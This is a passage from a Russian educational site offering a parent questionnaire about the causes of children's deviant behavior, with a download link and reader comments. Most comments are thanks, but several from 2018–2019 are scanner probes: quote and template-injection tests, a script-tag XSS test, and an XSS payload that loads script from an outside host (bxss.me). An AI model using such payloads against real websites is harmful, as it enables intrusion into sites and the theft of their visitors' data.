5.    Что, с вашей точки зрения, является основными причинами отклоняющегося от нормы поведения?

1)    стремление получить сильные впечатления;

2)    заболевания ребенка;

3)    повышенная возбудимость детей, неумение контролировать себя; 

4)    неблагополучная ситуация в семье; 

5)    стремление к самостоятельности и независимости; 

6)    недостаток знаний родителей о том, как справляться с трудными педагогическими ситуациями;

7)    отставание в учебе;

8)    пренебрежение со стороны сверстников;

9)    непонимание взрослыми трудностей детей;

10)  недостаточная уверенность ребенка в себе;

11)  отрицательная оценка взрослыми способностей детей;

12)  стрессовые жизненные ситуации;

13)  напряженная  социально-экономическая  ситуация  в  жизни  ребенка  (плохая  обеспеченность, безработица родителей и т.д.); 

14)  примеры насилия, жестокости, безнаказанности, получаемые через средства массовой

информации;

15)  чрезмерная занятость родителей;

16)  конфликты с родителями;

17)  что-то другое _______________________________________________

6.    К кому из специалистов вы обратились бы в первую очередь за помощью, если бы у вашего ребенка появились проблемы в поведении?

1)    классному руководителю;

2)    школьному психологу;

3)    социальному педагогу;

4)    психотерапевту;

5)    инспектору по делам несовершеннолетних;

6)    врачам;

7)    справились бы самостоятельно;

8)    к кому-то еще;

9)    затрудняюсь ответить.

7.    Возникают ли у вас опасения, что ваш ребенок может попасть в плохую компанию?

1) да;          2) нет;         3) затрудняюсь ответить.

8.    Если вы опасаетесь, что вызывает ваши опасения?

Предлагаем вам познакомиться с очень интересными и полезными материалами: 

Современное поколение, какое оно: тематика и содержание бесед для учащихся.

Беседы объединены рубриками:

  •  Молодежная субкультура 
  •   Девиантное поведение, или вредные привычки
  •  Проверь себя: тесты, игры, вопросы
Download
Беседа Тематика и содержание бесед для у
Microsoft Word Document 353.5 KB
Comments: 16
  • #16

    e (Sunday, 10 February 2019 02:36)

    1

  • #15

    e (Sunday, 10 February 2019 02:33)

    1'"

  • #14

    e (Wednesday, 31 October 2018 10:18)

    1

  • #13

    e (Wednesday, 31 October 2018 10:17)

    1'"()&%<acx><ScRiPt >Akbs(9881)</ScRiPt>

  • #12

    e (Wednesday, 31 October 2018 10:14)

    1'"

  • #11

    e (Wednesday, 31 October 2018 10:13)

    </script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013651&r=1920-199&h=1920-d7f77-2&/).slice(2),document.documentElement.appendChild(s))//'>

  • #10

    e (Wednesday, 31 October 2018 10:12)

    add

  • #9

    e (Wednesday, 31 October 2018 10:11)

    ${9999333+9999152}

  • #8

    e (Wednesday, 31 October 2018 10:11)

    http://testasp.vulnweb.com/t/xss.html?%00.jpg

  • #7

    света (Wednesday, 16 November 2016 05:07)

    спасибо вам большое

  • #6

    Елена (Friday, 08 July 2016 20:20)

    Спасибо.

  • #5

    Ирина (Thursday, 15 October 2015 07:16)

    Большое спасибо за необходимую информацию! То, что надо

  • #4

    Людмила (Friday, 08 May 2015 17:57)

    Огромное спасибо!

  • #3

    Людмила (Saturday, 21 February 2015 05:25)

    Вы такая, МОЛОДЕЦ! Так держать!!! Спасибо огромное!!!

  • #2

    Евгения (Sunday, 16 November 2014 11:39)

    Огромное спасибо за сайт!Столько полезной информации по очень интересующей меня теме!!

  • #1

    12 (Wednesday, 24 September 2014 10:14)

    Спасибо

Flag Counter
Рейтинг сайтов

счетчик посещений
Рейтинг@Mail.ru
продвижение сайта москва, продвижение сайтов недорого